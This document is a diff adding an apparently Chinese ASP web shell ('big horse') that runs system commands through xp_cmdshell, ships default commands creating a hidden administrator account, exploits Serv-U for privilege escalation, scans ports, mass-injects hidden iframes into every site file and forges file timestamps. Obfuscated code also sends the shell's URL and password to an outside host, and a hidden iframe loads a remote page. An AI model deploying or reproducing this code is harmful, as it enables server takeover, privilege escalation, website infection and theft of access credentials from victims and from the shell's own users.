+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user super super /add & net localgroup administrators super /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&Serveru&chr(38)&chr(112)&chr(61)&Serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10):Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�����</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user userSea passSea /add & net localgroup administrators userSea /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·������:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:function lIl(bb)
+but=22
+for i = 1 to len(bb)
+if mid(bb,i,1)<>"��" then
+If Asc(Mid(bb, i, 1)) < 32 Or Asc(Mid(bb, i, 1)) > 126 Then
+a = a & Chr(Asc(Mid(bb, i, 1)))
+else
+pk=asc(mid(bb,i,1))-but
+if pk>126 then
+pk=pk-95
+elseif pk<32 then
+pk=pk+95
+end if
+a=a&chr(pk)
+end if
+else
+a=a&vbcrlf
+end if
+next
+lIl=a
+end function
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf)):function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+
+case "apjdel":apjdel():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+%></body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>
\ No newline at end of file
diff --git a/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp b/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp
new file mode 100644
index 0000000..75ca122
--- /dev/null
+++ b/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp	
@@ -0,0 +1,629 @@
+<%
+
+UserPass="admin"'	����
+'------------------------�������ڷǷ�;��----------------------
+mmname="ţ����ɱ��Ȩ���ش���"
+bottomad="����! �ſ��Ƿ�������������!"
+blogurl="http://www.7jyewu.cn/"
+'----------------------һ�к���������޹�----------------------
+color1	="#000000"                                    'color1	="#000000"     
+color2	="#00ff00"                                    'color1	="#00ff00"    
+color3	="#FFFFCC"                                    'color1	="#FFFFCC"    
+color4  ="#fff"                                       'color1	="#fff"    
+color5	="#000000"                                    'color1	="#000000"    
+color6	="#000"                                       'color1	="#000"    
+color7  ="#FFF"                                       'color1	="#FFF"    
+'----------------------ҳ����ɫ�Լ���----------------------������ԭ������ɫ����_�Է����Dz�֪��Ū������
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,""\"",""\\""):End Function:Function RRePath(S):RRePath=Replace(S,""\\"",""\""):End Function:URL=Request.ServerVariables(""URL""):ServerIP=Request.ServerVariables(""LOCAL_ADDR""):Action=Request(""Action""):Pos=2:RootPath=Server.MapPath("".""):WWWRoot=Server.MapPath(""/""):Serveru=request.servervariables(""http_host"")&url:FolderPath=Request(""FolderPath""):serverp=UserPass:Pn=pos*44:FName=Request(""FName""):pso=5:BackUrl=""<br><br><center><a href='javascript:history.back()'>����</a></center>"""
+
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"</title>"
+RRS"<style type=""text/css"">"
+RRS"body,td{font-size: 12px;background-color:"&color1&";color:"&color2&";}"
+RRS"input,select,textarea{font-size: 12px;background-color:"&color3&";border:1px solid "&color4&"}"
+RRS".C{background-color:"&color5&";border:0px}"
+RRS".cmd{background-color:"&color6&";color:"&color7&"}"
+RRS"body{margin: 0px;margin-left:4px;}"
+RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: #00fcfc;SCROLLBAR-SHADOW-COLOR: #00fcfc;SCROLLBAR-ARROW-COLOR: #00fcfc;SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-COLOR: #00fcfc;SCROLLBAR-BASE-COLOR: #000000}"
+RRS"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}"
+RRS".am{color:#888;font-size:11px;}"
+RRS"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
